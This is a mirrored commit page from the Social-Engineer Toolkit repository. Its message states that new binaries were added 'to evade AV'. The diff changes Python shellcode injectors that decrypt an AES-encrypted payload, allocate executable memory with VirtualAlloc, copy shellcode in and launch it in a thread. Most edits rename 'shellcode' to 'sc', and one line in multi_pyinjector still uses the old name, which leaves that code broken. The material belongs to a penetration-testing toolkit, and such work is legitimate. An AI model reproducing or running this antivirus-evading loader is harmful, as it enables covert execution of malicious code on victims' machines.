mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-12-01 00:39:09 +00:00
Added new binaries to evade AV to pyinjector and multipyinjector
This commit is contained in:
parent
8b1213c9e1
commit
e1e4fe1e5e
4 changed files with 20 additions and 23 deletions
BIN
src/payloads/set_payloads/multi_pyinjector.binary
Normal file → Executable file
BIN
src/payloads/set_payloads/multi_pyinjector.binary
Normal file → Executable file
Binary file not shown.
|
@ -1,6 +1,6 @@
|
|||
#
|
||||
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
|
||||
# Version: 0.2
|
||||
# Version: 0.3
|
||||
#
|
||||
# This will spawn only a seperate thread per each shellcode instance.
|
||||
#
|
||||
|
@ -18,19 +18,19 @@ from Crypto.Cipher import AES
|
|||
import multiprocessing
|
||||
|
||||
# define our shellcode injection code through ctypes
|
||||
def inject(shellcode):
|
||||
shellcode = shellcode.decode("string_escape")
|
||||
shellcode = bytearray(shellcode)
|
||||
def injection(sc):
|
||||
sc = sc.decode("string_escape")
|
||||
sc = bytearray(sc)
|
||||
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
|
||||
ctypes.c_int(len(shellcode)),
|
||||
ctypes.c_int(len(sc)),
|
||||
ctypes.c_int(0x3000),
|
||||
ctypes.c_int(0x40))
|
||||
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
|
||||
ctypes.c_int(len(shellcode)))
|
||||
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
|
||||
ctypes.c_int(len(sc)))
|
||||
buf = (ctypes.c_char * len(shellcode)).from_buffer(sc)
|
||||
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
|
||||
buf,
|
||||
ctypes.c_int(len(shellcode)))
|
||||
ctypes.c_int(len(sc)))
|
||||
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
|
||||
ctypes.c_int(0),
|
||||
ctypes.c_int(ptr),
|
||||
|
@ -50,7 +50,7 @@ if __name__ == '__main__':
|
|||
payload_filename = sys.argv[1]
|
||||
if os.path.isfile(payload_filename):
|
||||
fileopen = file(payload_filename, "r")
|
||||
shellcode = fileopen.read()
|
||||
sc = fileopen.read()
|
||||
# if we didn't file our shellcode path then exit out
|
||||
if not os.path.isfile(payload_filename):
|
||||
sys.exit()
|
||||
|
@ -70,17 +70,17 @@ if __name__ == '__main__':
|
|||
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
|
||||
cipher = AES.new(secret)
|
||||
# our decrypted value for shellcode
|
||||
shellcode = DecryptAES(cipher, shellcode)
|
||||
sc = DecryptAES(cipher, sc)
|
||||
# split our shellcode into a list
|
||||
shellcode = shellcode.split(",")
|
||||
sc = sc.split(",")
|
||||
|
||||
# except an indexerror and allow it to continue forward
|
||||
except IndexError:
|
||||
sys.exit()
|
||||
|
||||
jobs = []
|
||||
for payload in shellcode:
|
||||
for payload in sc:
|
||||
if payload != "":
|
||||
p = multiprocessing.Process(target=inject, args=(payload,))
|
||||
p = multiprocessing.Process(target=injection, args=(payload,))
|
||||
jobs.append(p)
|
||||
p.start()
|
||||
|
|
Binary file not shown.
17
src/payloads/set_payloads/pyinjector_args.py
Normal file → Executable file
17
src/payloads/set_payloads/pyinjector_args.py
Normal file → Executable file
|
@ -9,38 +9,35 @@ import sys
|
|||
|
||||
# see if we specified shellcode
|
||||
try:
|
||||
shellcode = sys.argv[1]
|
||||
sc = sys.argv[1]
|
||||
|
||||
# if we didn't specify a param
|
||||
except IndexError:
|
||||
print "Python Shellcode Injector: Written by Dave Kennedy at TrustedSec"
|
||||
print "Example: pyinjector.exe \\x41\\x41\\x41\\x41"
|
||||
print "Usage: pyinjector.exe <shellcode>"
|
||||
sys.exit()
|
||||
|
||||
# need to code the input into the right format through string escape
|
||||
shellcode = shellcode.decode("string_escape")
|
||||
sc = sc.decode("string_escape")
|
||||
|
||||
# convert to bytearray
|
||||
shellcode = bytearray(shellcode)
|
||||
sc = bytearray(sc)
|
||||
|
||||
# use types windll.kernel32 for virtualalloc reserves region of pages in virtual addres sspace
|
||||
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
|
||||
ctypes.c_int(len(shellcode)),
|
||||
ctypes.c_int(len(sc)),
|
||||
ctypes.c_int(0x3000),
|
||||
ctypes.c_int(0x40))
|
||||
|
||||
# use virtuallock to lock region for physical address space
|
||||
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
|
||||
ctypes.c_int(len(shellcode)))
|
||||
ctypes.c_int(len(sc)))
|
||||
|
||||
# read in the buffer
|
||||
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
|
||||
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
|
||||
|
||||
# moved the memory in 4 byte blocks
|
||||
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
|
||||
buf,
|
||||
ctypes.c_int(len(shellcode)))
|
||||
ctypes.c_int(len(sc)))
|
||||
# launch in a thread
|
||||
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
|
||||
ctypes.c_int(0),
|
||||
|
|
Loading…
Reference in a new issue